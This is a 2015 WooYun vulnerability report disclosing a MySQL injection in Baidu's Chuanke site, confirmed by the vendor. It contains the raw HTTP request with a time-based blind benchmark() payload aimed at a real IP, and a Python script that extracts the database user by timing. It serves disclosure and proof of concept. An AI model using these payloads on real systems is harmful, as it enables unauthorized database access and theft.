百度传课网一处MySQL注射(附验证脚本)

编号129572
Urlhttp://www.wooyun.org/bug.php?action=view&id=129572
漏洞状态厂商已经确认
漏洞标题百度传课网一处MySQL注射(附验证脚本)
漏洞类型SQL注射漏洞
厂商百度
白帽子lijiejie
提交日期2015-07-27 07:59:00
公开日期2015-09-10 11:04:00
修复时间(not set)
确认时间2015-07-27 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank15
漏洞简介
百度传课网一处MySQL注射(附验证脚本)
漏洞细节

注入点:

POST /?act=custom&do=loadModule&mod=school HTTP/1.1
Content-Length: 347
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://123.125.112.93
Host: 123.125.112.93
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
mid=5&setting%5Bcategory%5D=(benchmark(4000000*(length(user())=17),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279


参数setting[category]和setting[sortlist]可注入。

POC

用benchmark保险一些,不会将db server打挂了。
猜解user(),得到:

[Done] MySQL user is [email protected]


chuanke.png


python脚本:

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}
payloads = '[email protected]_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 18):
for payload in payloads:
s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))
s = "mid=5&setting%5Bcategory%5D=(benchmark(4000000*(" + s + "),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279"
conn = httplib.HTTPConnection('123.125.112.93', timeout=30)
conn.request(method='POST', url='/?act=custom&do=loadModule&mod=school', body=s, headers=headers)
start_time = time.time()
html_doc = conn.getresponse().read()
conn.close()
print '.',
if time.time() - start_time > 1.0:
user += payload
print '\n[in progress]', user,
break

print '\n[Done] MySQL user is %s' % user

修复方案

参数过滤

状态信息 2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开
厂商回复感谢提交
回应信息危害等级:高漏洞Rank:15 确认时间:2015-07-27 11:03
Showing 1-6 of 6 items.
评论内容评论人点赞数评论时间

@子非海绵宝宝 百度请我吃小龙虾,哈哈 :)

lijiejie02015-07-27 10:06:00

吃完百度外卖的小龙虾,就开始搞百度了。。。 @lijiejie

PyNerd02015-07-27 09:46:00

lijiejie

牛 小 帅02015-07-27 09:14:00

@子非海绵宝宝 那么小能满足你吗? 要大的.

Wulala02015-07-27 09:09:00

前排失败 = =

皮卡丘♪~(´ε` )02015-07-27 09:01:00

2个...这回小龙虾免费了[email protected]

子非海绵宝宝02015-07-27 08:47:00